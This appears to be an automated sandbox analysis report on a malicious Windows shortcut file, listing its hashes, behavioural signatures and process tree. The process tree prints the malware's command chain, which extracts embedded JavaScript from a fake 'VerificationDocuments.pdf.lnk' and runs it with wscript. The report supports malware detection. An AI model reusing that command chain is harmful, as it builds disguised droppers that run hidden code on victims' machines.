Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2024 09:29
Static task
static1
Behavioral task
behavioral1
Sample
fc00819c4cdc8609313041cf345a7dca_JaffaCakes118.lnk
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
General
-
Target
fc00819c4cdc8609313041cf345a7dca_JaffaCakes118.lnk
-
Size
938KB
-
MD5
fc00819c4cdc8609313041cf345a7dca
-
SHA1
3cb2d94e7a3b6d6141106e3973189e06306ce2f0
-
SHA256
83c375dcdadb8467955f5e124cf4e8d6eac78c51c03fb7393dc810a243ba1a90
-
SHA512
53b2761be2a805aa6cdc7857b70da8b25ccf0990dc1f9a6501ed73af9909db6a58667b9bcd786c9acc19309b18bc228ac02d3ebe97063b1cf6bf2362c935131c
-
SSDEEP
12288:HZ3Si/5CQsdRgvhS+u1vBcxqDE/4QiqkgLGVRivcLwOtIO1nKnYn/oGug+:53D5C5LgvMr1mx8y4dqLGnZn12Yngfg+
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation cmd.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 5024 wrote to memory of 1504 5024 cmd.exe 83 PID 5024 wrote to memory of 1504 5024 cmd.exe 83 PID 1504 wrote to memory of 880 1504 cmd.exe 84 PID 1504 wrote to memory of 880 1504 cmd.exe 84 PID 1504 wrote to memory of 1416 1504 cmd.exe 85 PID 1504 wrote to memory of 1416 1504 cmd.exe 85 PID 1504 wrote to memory of 2772 1504 cmd.exe 86 PID 1504 wrote to memory of 2772 1504 cmd.exe 86
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\fc00819c4cdc8609313041cf345a7dca_JaffaCakes118.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&move "VerificationDocuments.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "END2">"C:\Users\Admin\AppData\Local\Temp\0.js"&wscript "C:\Users\Admin\AppData\Local\Temp\0.js"2⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""3⤵PID:880
-
-
C:\Windows\system32\find.exefind "END2"3⤵PID:1416
-
-
C:\Windows\system32\wscript.exewscript "C:\Users\Admin\AppData\Local\Temp\0.js"3⤵PID:2772
-
-